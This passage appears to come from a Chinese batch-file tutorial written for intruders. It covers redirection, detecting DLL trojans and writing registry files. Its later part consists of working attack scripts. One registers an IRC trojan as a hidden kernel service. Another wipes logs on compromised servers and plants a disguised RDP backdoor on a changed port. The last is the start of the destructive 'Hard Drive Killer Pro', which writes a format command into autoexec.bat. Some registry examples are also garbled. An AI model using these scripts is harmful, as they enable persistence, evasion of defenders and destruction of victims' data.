echo hello world>c:\hello.txt (stupid example?) 

　　sample2: 

　　時下DLL木馬盛行，我們知道system32是個捉迷藏的好地方，許多木馬都削尖了腦袋往那里鉆，DLL馬也不例外，針對這一點我們可以在安裝好系統(tǒng)和必要的應(yīng)用程序后，對該目錄下的EXE和DLL文件作一個記錄： 

　　運行CMD--轉(zhuǎn)換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 

　　這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中, 

　　日后如發(fā)現(xiàn)異常但用傳統(tǒng)的方法查不出問題時,則要考慮是不是系統(tǒng)中已經(jīng)潛入DLL木馬了. 

　　這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然后運行: 

　　CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比較前后兩次的DLL和EXE文件,并將結(jié)果輸入到diff.txt中),這樣我們就能發(fā)現(xiàn)一些多出來的DLL和EXE文件,然后通過查看創(chuàng)建時間、版本、是否經(jīng)過壓縮等就能夠比較容易地判斷出是不是已經(jīng)被DLL木馬光顧了。沒有是最好，如果有的話也不要直接DEL掉，先用regsvr32 /u trojan.dll將后門DLL文件注銷掉,再把它移到回收站里，若系統(tǒng)沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。 

3.< 、>& 、<& 

　　< 從文件中而不是從鍵盤中讀入命令輸入。 

　　>& 將一個句柄的輸出寫入到另一個句柄的輸入中。 

　　<& 從一個句柄讀取輸入并將其寫入到另一個句柄輸出中。 

　　這些并不常用，也就不多做介紹。 

　　No.5 

　　五.如何用批處理文件來操作注冊表 

　　在入侵過程中經(jīng)常回操作注冊表的特定的鍵值來實現(xiàn)一定的目的，例如:為了達到隱藏后門、木馬程序而刪除Run下殘余的鍵值。或者創(chuàng)建一個服務(wù)用以加載后門。當(dāng)然我們也會修改注冊表來加固系統(tǒng)或者改變系統(tǒng)的某個屬性，這些都需要我們對注冊表操作有一定的了解。下面我們就先學(xué)習(xí)一下如何使用.REG文件來操作注冊表.(我們可以用批處理來生成一個REG文件) 

　　關(guān)于注冊表的操作，常見的是創(chuàng)建、修改、刪除。 

　　1.創(chuàng)建 

　　創(chuàng)建分為兩種，一種是創(chuàng)建子項(Subkey) 

　　我們創(chuàng)建一個文件，內(nèi)容如下： 

　　Windows Registry Editor Version 5.00 

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 

　　然后執(zhí)行該腳本，你就已經(jīng)在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創(chuàng)建了一個名字為“hacker”的子項。 

　　另一種是創(chuàng)建一個項目名稱 

　　那這種文件格式就是典型的文件格式，和你從注冊表中導(dǎo)出的文件格式一致，內(nèi)容如下： 

　　Windows Registry Editor Version 5.00 

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch" 

　　"Door"=C:\\WINNT\\system32\\door.exe 

　　"Autodos"=dword:02 

　　這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下 

　　新建了:Invader、door、about這三個項目 

　　Invader的類型是“String Value” 

　　door的類型是“REG SZ Value” 

　　Autodos的類型是“DWORD Value” 

　　2.修改 

　　修改相對來說比較簡單，只要把你需要修改的項目導(dǎo)出，然后用記事本進行修改，然后導(dǎo)入（regedit /s）即可。 

　　3.刪除 

　　我們首先來說說刪除一個項目名稱，我們創(chuàng)建一個如下的文件： 

　　Windows Registry Editor Version 5.00 

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

　　"Ex4rch"=- 

　　執(zhí)行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了； 

　　我們再看看刪除一個子項，我們創(chuàng)建一個如下的腳本： 

　　Windows Registry Editor Version 5.00 

　　[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

　　執(zhí)行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經(jīng)被刪除了。 

　　相信看到這里，.reg文件你基本已經(jīng)掌握了。那么現(xiàn)在的目標就是用批處理來創(chuàng)建特定內(nèi)容的.reg文件了，記得我們前面說道的利用重定向符號可以很容易地創(chuàng)建特定類型的文件。 

　samlpe1:如上面的那個例子,如想生成如下注冊表文件 

　　Windows Registry Editor Version 5.00 

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

　　"Invader"="Ex4rch" 

　　"door"=hex:255 

　　"Autodos"=dword:000000128 

　　只需要這樣： 

　　@echo Windows Registry Editor Version 5.00>>Sample.reg 

　　@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg 

　　@echo "Invader"="Ex4rch">>Sample.reg 

　　@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg 

　　@echo "Autodos"=dword:02>>Sample.reg 

　　samlpe2: 

　　我們現(xiàn)在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現(xiàn)木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導(dǎo)致木馬被查殺,相對地若是將木馬程序注冊為系統(tǒng)服務(wù)則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe) 

　　@start windrv32.exe 

　　@attrib +h +r windrv32.exe 

　　@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll 

　　@echo "windsnx "=- >>patch.dll 

　　@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe 

　　@regedit /s patch.dll 

　　@delete patch.dll 

　　@REM [刪除DSNXDE在注冊表中的啟動項，用sc.exe將之注冊為系統(tǒng)關(guān)鍵性服務(wù)的同時將其屬性設(shè)為隱藏和只讀，并config為自啟動] 

　　@REM 這樣不是更安全^_^. 
六.精彩實例放送。 

　　1.刪除win2k/xp系統(tǒng)默認共享的批處理 

　　------------------------ cut here then save as .bat or .cmd file --------------------------- 

　　@echo preparing to delete all the default shares.when ready pres any key. 

　　@pause 

　　@echo off 

　　:Rem check parameters if null show usage. 

　　if {%1}=={} goto :Usage 

　　:Rem code start. 

　　echo. 

　　echo ------------------------------------------------------ 

　　echo. 

　　echo Now deleting all the default shares. 

　　echo. 

　　net share %1$ /delete 

　　net share %2$ /delete 

　　net share %3$ /delete 

　　net share %4$ /delete 

　　net share %5$ /delete 

　　net share %6$ /delete 

　　net share %7$ /delete 

　　net share %8$ /delete 

　　net share %9$ /delete 

　　net stop Server 

　　net start Server 

　　echo. 

　　echo All the shares have been deleteed 

　　echo. 

　　echo ------------------------------------------------------ 

　　echo. 

　　echo Now modify the registry to change the system default properties. 

　　echo. 

　　echo Now creating the registry file 

　　echo Windows Registry Editor Version 5.00> c:\delshare.reg 

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg 

　　echo "AutoShareWks"=dword:00000000>> c:\delshare.reg 

　　echo "AutoShareServer"=dword:00000000>> c:\delshare.reg 

　　echo Nowing using the registry file to chang the system default properties. 

　　regedit /s c:\delshare.reg 

　　echo Deleting the temprotarily files. 

　　del c:\delshare.reg 

　　goto :END 
　:Usage 

　　echo. 

　　echo ------------------------------------------------------ 

　　echo. 

　　echo ☆ A example for batch file ☆ 

　　echo ☆ [Use batch file to change the sysytem share properties.] ☆ 

　　echo. 

　　echo Author：Ex4rch 

　　echo Mail:Ex4rch@hotmail.com QQ:1672602 

　　echo. 

　　echo Error：Not enough parameters 

　　echo. 

　　echo ☆ Please enter the share disk you wanna delete ☆ 

　　echo. 

　　echo For instance，to delete the default shares: 

　　echo delshare c d e ipc admin print 

　　echo. 

　　echo If the disklable is not as C: D: E: ，Please chang it youself. 

　　echo. 

　　echo example： 

　　echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ： 

　　echo delshare c d e x y z ipc admin print 

　　echo. 

　　echo *** you can delete nine shares once in a useing *** 

　　echo. 

　　echo ------------------------------------------------------ 

　　goto :EOF 

　　:END 

　　echo. 

　　echo ------------------------------------------------------ 

　　echo. 

　　echo OK,delshare.bat has deleted all the share you assigned. 

　　echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. 

　　echo 

　　echo. 

　　echo ------------------------------------------------------ 

　　echo. 

　　:EOF 

　　echo end of the batch file 

　　------------------------ cut here then save as .bat or .cmd file --------------------------- 
--------------------------- 

　　下面命令是清除肉雞所有日志，禁止一些危險的服務(wù)，并修改肉雞的terminnal service留跳后路。 

　　@regedit /s patch.dll 

　　@net stop w3svc 

　　@net stop event log 

　　@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 

　　@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 

　　@del c:\winnt\system32\config\*.event /f /q 

　　@del c:\winnt\system32dtclog\*.* /f /q 

　　@del c:\winnt\*.txt /f /q 

　　@del c:\winnt\*.log /f /q 

　　@net start w3svc 

　　@net start event log 

　　@rem [刪除日志] 

　　@net stop lanmanserver /y 

　　@net stop Schedule /y 

　　@net stop RemoteRegistry /y 

　　@del patch.dll 

　　@echo The server has been patched,Have fun. 

　　@del patch.bat 

　　@REM [禁止一些危險的服務(wù)。] 

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll 

　　@echo "PortNumber"=dword:00002010 >>patch.dll 

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll 

　　@echo "PortNumber"=dword:00002012 >>patch.dll 

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll 

　　@echo "Start"=dword:00000002 >>patch.dll 

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll 

　　@echo "Start"=dword:00000002 >>patch.dll 

　　@echo "ErrorControl"=dword:00000001 >>patch.dll 

　　@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll 

　　@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll 

　　@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll 

　　@echo "ObjectName"="LocalSystem" >>patch.dll 

　　@echo "Type"=dword:00000010 >>patch.dll 

　　@echo "Description"="Keep record of the program and windows message。" >>patch.dll 

　　@echo "DisplayName"="Microsoft EventLog" >>patch.dll 

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll 

　　@echo "Start"=dword:00000004 >>patch.dll 

　　@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe 

　　@REM [修改3389連接，端口為8210(十六進制為00002012)，名稱為Microsoft EventLog，留條后路] 

　　　3.Hard Drive Killer Pro Version 4.0（玩批處理到這個水平真的不容易了。） 

　　------------------------ cut here then save as .bat or .cmd file --------------------------- 

　　@echo off 

　　rem This program is dedecated to a very special person that does not want to be named. 

　　:start 

　　cls 

　　echo PLEASE WAIT WHILE PROGRAM LOADS . . . 

　　call attrib -r -h c:\autoexec.bat >nul 

　　echo @echo off >c:\autoexec.bat 

　　echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat 

　　call attrib +r +h c:\autoexec.bat >nul 

　　rem Drive checking and assigning the valid drives to the drive variable. 

　　set drive= 

　　set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z 

　　rem code insertion for Drive Checking takes place here. 

　　rem drivechk.bat is the file name under the root directory.